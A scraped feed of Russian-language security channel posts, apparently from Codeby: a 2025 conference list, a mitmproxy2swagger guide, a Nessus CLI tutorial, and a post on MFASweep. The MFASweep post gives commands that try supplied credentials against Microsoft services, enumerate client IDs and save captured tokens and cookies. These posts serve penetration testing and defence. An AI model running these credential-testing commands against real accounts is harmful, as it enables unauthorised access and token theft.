В ближайшие месяцы ИБ-специалисты смогут посетить ряд значимых для комьюнити мероприятий. Представляем подборку из пяти крупных конференций:

1️⃣ ИБ АСУ ТП КВО 2025
➡️ Дата: 4–5 марта 2025 года
➡️ Место: Москва, ул. Вильгельма Пика, 16, Soluxe Hotel Moscow 5*
Мероприятие по защите автоматизированных систем управления технологическими процессами (АСУ ТП). Ведущие специалисты обсудят актуальные угрозы, регуляторные требования и лучшие практики безопасности. 35 докладчиков, 500 делегатов и 700 участников.
🔴 Подробнее

2️⃣ AppSecFest 2025
➡️ Дата: 25 апреля 2025 года
➡️ Место: Алматы, Казахстан
Конференция по безопасности веб- и мобильных приложений, DevSecOps и современным методам защиты ПО. В программе — разбор актуальных атак, мастер-классы и выступления ведущих экспертов.
🔴 Подробнее

3️⃣ ИНФОФОРУМ-Тюмень 2025
➡️ 22–25 апреля 2025
➡️ г. Тюмень, Тюменский Технопарк
Первая межрегиональная конференция по информационной безопасности в Уральском федеральном округе объединит ведущих специалистов в сфере ИБ, представителей госструктур, бизнеса и разработчиков технологий для обсуждения киберугроз, защиты критической инфраструктуры и импортозамещения в отрасли.
🔴 Подробнее

4️⃣ Positive Hack Days (PHDays) 2025
➡️ Дата: 22-24 мая 2025 года
➡️ Место: Москва, "Лужники"
Один из крупнейших форумов по кибербезопасности в России. В программе: кибербитвы, практические воркшопы, презентации от международных и российских экспертов.
🔴 Подробнее

5️⃣ ЦИПР 2025 (Цифровая индустрия промышленной России)
➡️ Дата: 3–6 июня 2025 года
➡️ Место: Нижний Новгород, Россия
Форум о цифровой трансформации и информационной безопасности в промышленности и госсекторе. В центре внимания — импортозамещение, защита критической инфраструктуры и развитие отечественного ИБ-рынка.
🔴 Подробнее

А на какие пойдете вы? Пишите в комментариях!

Читать полностью…

Codeby

mitmproxy2swagger — утилита для автоматического преобразования захваченного трафика через mitmproxy в OpenAPI Specification. Установка происходит через pip3 install mitmproxy2swagger или docker:

git clone git@github.com:alufers/mitmproxy2swagger.git
cd mitmproxy2swagger
docker build -t mitmproxy2swagger .


Использование

1️⃣Для создания спецификации сначала запускаем mitmweb — веб-интерфейс, встроенный в mitmproxy, с помощью команды mitmweb. Теперь необходимо настроить браузер, чтобы весь трафик проходил через mitmproxy.

2️⃣Изучаем наш целевой сайт, самостоятельно переходим на разные эндпоинты, генерируя трафик. Далее необходимо сохранить полученные пакеты в файл и запустить команду:
mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>

<api_prefix> Это базовый URL-адрес API, который мы хотим проанализировать.

3️⃣При выполнении первого прохода в файле схемы появляются эндпоинты API, которые удалось вычленить из файла, с префиксом ignore. Его необходимо удалить и запустить второй проход, тем самым сгенерировав описания конечных точек:
mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>


4️⃣ Финальный шаг — скопировать полученное описание в swagger для получения удобочитаемой документации.

‼️ Удобным является поддержка в mitmproxy2swagger формата har. Можно также осуществить взаимодействие с целевым веб-сайтом и экспортировать трафик из браузера DevTools на вкладке Network и проделать шаги 2-4.

Читать полностью…

Codeby

Как обнаружить скрытые угрозы в вашей сети с помощью Nessus

Nessus — это популярный инструмент для сканирования уязвимостей, разработанный компанией Tenable, который направлен на выявление слабых мест в системах и сетях, предотвращая возможные атаки.


Функции Nessus
⌨️ Проверяет системы на наличие известных угроз, таких как ошибки конфигурации и устаревшие версии ПО.
⌨️ Работает с Windows, Linux, macOS и сетевыми устройствами.
⌨️ Обновляемая база плагинов позволяет находить даже новые уязвимости.
⌨️ Удобный веб-интерфейс для настройки сканирования и просмотра отчетов.

Пример использования Nessus через CLI
1️⃣ Установка на Linux Nessus
sudo apt install nessus


2️⃣ Запуск
sudo systemctl start nessusd

Затем перейдите по адресу https://localhost:8834 для настройки через веб-интерфейс.

3️⃣ Аутентификация через CLI
nessuscli login -u <username> -p <password>


4️⃣ Запуск сканирования
nessuscli scan --name "Network Scan" --targets "192.168.1.0/24" --policy "basic-network-scan"


5️⃣ Просмотр результатов
nessuscli report --scan-id <scan_id>



⌨️Преимущества Nessus
⌨️ Регулярные обновления плагинов позволяют находить новые уязвимости.
⌨️ Поддерживает различные операционные системы и сетевые устройства.

⌨️Недостатки Nessus
⌨️ Для полной функциональности нужна платная лицензия.
⌨️ При сканировании больших сетей может сильно нагружать ресурсы.

Читать полностью…

Codeby

MFASweep — PowerShell скрипт, пытающийся выполнить вход в различные службы Microsoft, используя предоставленные учётные данные, и определяет, включена ли многофакторная аутентификация. Он также выполняет дополнительную проверку конфигурации ADFS. По умолчанию скрипт пытается войти в указанную учётную запись десять раз.

👀 Имеется возможность входа в следующие сервисы:
⏺️Microsoft Graph API (Invoke-GraphAPIAuth)
⏺️Azure Service Management API (Invoke-AzureManagementAPIAuth)
⏺️Microsoft 365 Exchange Web Services (Invoke-EWSAuth)
⏺️Microsoft 365 Web Portal (Invoke-O365WebPortalAuth)
⏺️Microsoft 365 Active Sync (Invoke-O365ActiveSyncAuth)
⏺️ADFS (Invoke-ADFSAuth)

💡 Примеры использования:
Команда будет пытаться войти во все сервисы кроме ADFS. При успешном входе токены и/или файлы cookie будут записаны в AccessTokens.json.

Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokens 


Команда работает с с методами аутентификации по умолчанию и проверяет наличие ADFS.
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -Recon -IncludeADFS


Команда будет перебирать различные типы ресурсов и идентификаторы клиентов во время аутентификации ROPC, чтобы найти однофакторный доступ для различных комбинаций идентификаторов клиентов и ресурсов.
Invoke-BruteClientIDs -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokens

Читать полностью…
Subscribe to a channel